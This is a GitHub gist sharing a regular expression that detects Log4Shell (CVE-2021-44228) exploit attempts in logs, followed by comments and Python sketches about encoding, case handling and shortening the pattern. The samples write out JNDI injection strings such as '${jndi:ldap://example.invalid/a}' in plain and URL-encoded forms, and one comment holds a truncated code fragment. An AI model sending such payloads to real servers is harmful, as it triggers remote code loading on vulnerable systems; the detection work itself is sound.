@carlchan
Last active December 19, 2021 19:27
Log4Shell regex
(\$|%(25)*24)(\{|%(25)*7B)(((\$|%(25)*24)(\{|%(25)*7B)[^}]+(j|%[46]a)(n|%[46]e)?(d|%[46]4)?(i|%[46]9)?(%(25)*7(d|%[46]4)|\})|(j|%[46]a)(n|%[46]e)?(d|%[46]4)?(i|%[46]9)?)((\$|%(25)*24)(\{|%(25)*7B)[^}]+(j|%[46]a)?(n|%[46]e)(d|%[46]4)?(i|%[46]9)?(%(25)*7(d|%[46]4)|\})|(j|%[46]a)?(n|%[46]e)(d|%[46]4)?(i|%[46]9)?)((\$|%(25)*24)(\{|%(25)*7B)[^}]+(j|%[46]a)?(n|%[46]e)?(d|%[46]4)(i|%[46]9)?(%(25)*7(d|%[46]4)|\})|(j|%[46]a)?(n|%[46]e)?(d|%[46]4)(i|%[46]9)?)((\$|%(25)*24)(\{|%(25)*7B)[^}]+(j|%[46]a)?(n|%[46]e)?(d|%[46]4)?(i|%[46]9)(%(25)*7(d|%[46]4)|\})|(j|%[46]a)?(n|%[46]e)?(d|%[46]4)?(i|%[46]9))|((\$|%(25)*24)(\{|%(25)*7B)[^}]+(j|%[46]a)?(n|%[46]e)?(d|%[46]4)?(i|%[46]9)?(%(25)*7(d|%[46]4)|\})|(j|%[46]a|n|%[46]e|d|%[46]4|i|%[46]9)+)+)
@carlchan
Author

carlchan commented Dec 14, 2021

Catches a number of obfuscation and URL-encoding techniques in logs when looking for attempts to exploit the Log4j vulnerability, with few false positives.
#CVE-2021-44228
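
To make the URL-encoding handling concrete, here is a minimal Python sketch that tests only the opening-delimiter fragment copied from the start of the regex above. The sample strings and the `has_opening` helper are hypothetical and exist only for illustration. On its own this fragment flags any `${`, so it is not a substitute for the full pattern.

```python
import re

# Opening-delimiter fragment copied from the start of the gist's regex:
# a literal "$" or "%24", then a literal "{" or "%7B". The "(25)*" part
# absorbs repeated encoding of the "%" sign itself ("%2524", "%252524", ...).
OPENING = re.compile(r"(\$|%(25)*24)(\{|%(25)*7B)")

# Hypothetical sample inputs, not taken from real logs.
samples = [
    "${jndi:ldap://example.invalid/a}",         # plain
    "%24%7Bjndi:ldap://example.invalid/a%7D",   # URL-encoded once
    "%2524%257Bjndi:ldap://example.invalid/a",  # URL-encoded twice
    "GET /index.html HTTP/1.1",                 # benign request line
]


def has_opening(line: str) -> bool:
    """Return True if the line contains a plain or percent-encoded "${"."""
    return OPENING.search(line) is not None


results = [has_opening(s) for s in samples]
print(results)
```

The first three samples contain the delimiter in some encoding and the last one does not.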

@back2root

The following matches even more:
https://github.com/back2root/log4shell-rex

@carlchan
Author

@back2root nice, thank you

@Mario-Lugi

@back2root: Is it possible to get the regex in RE2 format?

@back2root

back2root commented Dec 17, 2021

@Mario-Lugi can you test with RE2 or have you tried using it with RE2?
Where could I test?

I think there's a chance the regex already works on RE2, unless I'm overlooking something in https://github.com/google/re2/wiki/Syntax

@Mario-Lugi

@back2root: Hey, thanks for the response. I ran part of the regex and it worked, but I couldn't run the complete regex because it is too long. Is it possible to split it into two?

@back2root

@Mario-Lugi There are ways to shorten the regex:

First, to make the regex case-insensitive, I spelled out both the upper- and lower-case characters, like: "/...[Aa].../". You could replace that with "/...a.../i" to save a few characters. Of course, this wouldn't work for encoded characters.

Second, you might want to remove the base64-encoded option. I also plan to remove it, as I realized that base64 is implemented in Log4j but has not made it into a release yet. So the benefit of supporting base64 encoding may be small, and the detection of base64 encoding is rudimentary. Log4ShellRex="${dollar}${curly_open}${sp}${plain}

Third, you can shift the trade-off between the length of the regex and the false-positive rate a bit by matching only the "${jndi:" part. To generate the regex for this, simply set plain="${jndi}${sp}${colon}" in RegEx_Generator.sh.

Question: Where do you face length restrictions of a regular expression?
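
The first and third suggestions above can be sketched in Python as follows. The patterns here are simplified stand-ins written for illustration, not output of RegEx_Generator.sh. The scheme list in `WITH_SCHEME` and both sample strings are assumptions. The `ENCODED_J` pattern shows one reading of the remark about encoded characters: the flag covers the case of the hex digit, but not the case of the letter that the escape encodes.

```python
import re

# First suggestion: explicit character classes vs. the case-insensitive flag.
EXPLICIT = re.compile(r"\$\{[Jj][Nn][Dd][Ii]:")
FLAGGED = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Percent-encoded letters: the flag lets "a" match "A" in the hex digits,
# but "%6a" encodes "j" while "%4a" encodes "J", so the [46] alternation
# used in the gist's regex is still required.
ENCODED_J = re.compile(r"%[46]a", re.IGNORECASE)

# Third suggestion: match only the "${jndi:" prefix (shorter pattern, more
# false positives) vs. also requiring a scheme. The scheme list below is an
# assumption made for this sketch.
WITH_SCHEME = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

# Hypothetical inputs.
attack = "${JnDi:ldap://example.invalid/a}"
mention = "lookup syntax is ${jndi:name}"

for name, pattern in [("explicit", EXPLICIT), ("flagged", FLAGGED),
                      ("with_scheme", WITH_SCHEME)]:
    print(name, bool(pattern.search(attack)), bool(pattern.search(mention)))
```

The prefix-only patterns flag both strings, while the longer one flags only the string that carries a scheme. That is the length versus false-positive trade-off in miniature.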
